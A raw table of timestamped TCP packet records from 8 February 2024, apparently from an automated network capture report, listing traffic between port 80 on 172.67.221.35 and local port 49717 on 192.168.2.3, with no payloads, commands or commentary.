                                                                                                                                                                    Feb 8, 2024 19:08:48.561170101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561182976 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561197042 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561207056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.561209917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561225891 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.561247110 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.561914921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561985016 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.561997890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562011003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562022924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562041044 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.562066078 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.562753916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562767982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562796116 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.562829018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562843084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562855005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.562871933 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.562896967 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.563638926 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.563654900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.563667059 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.563673973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.563680887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.563731909 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.564457893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.564474106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.564486980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.564498901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.564506054 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.564515114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.564532995 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.564558029 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.565203905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.565285921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.565299988 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.565313101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.565326929 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.565339088 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.565361977 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.566121101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566133976 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566147089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566159964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566170931 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.566174030 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566193104 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.566229105 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.566837072 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566894054 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566906929 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566926956 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566951990 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.566973925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.566977978 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.567715883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.567729950 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.567748070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.567760944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.567764044 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.567779064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.567792892 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.567830086 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.568538904 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.568557978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.568603039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.568605900 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.568619967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.568633080 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.568669081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.569370031 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.569384098 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.569397926 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.569411039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.569422960 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.569431067 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.569453955 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.569470882 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.570183992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.570197105 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.570209980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.570223093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.570235014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.570247889 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.570280075 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.647912025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.647942066 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.647959948 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.647974014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.647990942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648051023 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.648097038 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.648236036 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648253918 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648267984 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648303986 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.648309946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648313999 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.648325920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.648365974 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.649039030 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649106026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649121046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649137020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649163961 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.649187088 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.649844885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649862051 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649876118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649905920 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.649918079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649933100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.649960995 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.650625944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.650645018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.650661945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.650674105 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.650677919 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.650691986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.650701046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.650729895 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.651345015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.651391983 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.651406050 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.651418924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.651433945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.651433945 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.651460886 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.652282000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.652297974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.652312040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.652327061 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.652338982 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.652344942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.652368069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.652390957 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.652977943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653027058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653043032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653055906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653069973 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653074980 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.653114080 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.653764963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653800011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653805017 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.653814077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653831005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653846979 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.653861046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.653889894 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.654604912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.654622078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.654663086 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.654664993 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.654679060 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.654694080 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.654723883 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.655505896 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.655524969 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.655538082 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.655551910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.655567884 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.655570030 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.655592918 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.655627012 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.656311035 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.656328917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.656349897 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.656368971 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.656384945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.656394958 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.656425953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.657138109 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657157898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657171011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657183886 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.657186031 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657201052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657215118 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.657243013 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.657944918 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657960892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657974005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.657989025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658001900 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.658004999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658037901 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.658776999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658795118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658808947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658823967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658838034 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.658839941 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.658873081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.658889055 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.659526110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.659579039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.659595013 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.659607887 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.659621000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.659626007 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.659672022 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.660351992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.660409927 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.660444975 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.660460949 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.660475969 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.660490990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.660517931 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.660543919 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.661403894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.661420107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.661926985 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.661943913 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.661958933 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.661973953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.662009001 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.662009954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662081003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.662092924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662111044 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662126064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662141085 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662183046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.662830114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662904978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662919998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662936926 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662950993 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.662955046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.662976027 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.663717031 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.663736105 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.663749933 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.663764000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.663772106 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.663780928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.663794041 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.663827896 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.664561987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.664577007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.664591074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.664606094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.664621115 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.664634943 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.664649010 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.665424109 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.665438890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.665452957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.665466070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.665472984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.665481091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.665498972 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.665529013 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.673618078 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.673634052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.673648119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.673660994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.673674107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.673770905 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.673770905 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.674223900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674237967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674252033 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674282074 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.674287081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674302101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674312115 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.674340963 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.674748898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674762964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674798965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674813032 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674814939 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.674828053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.674859047 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.675548077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.675563097 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.675576925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.675590038 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.675605059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.675607920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.675635099 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.675653934 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:48.676436901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.676450968 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.676462889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.676476955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.676490068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:48.676493883 CET4971780192.168.2.3172.67.221.35
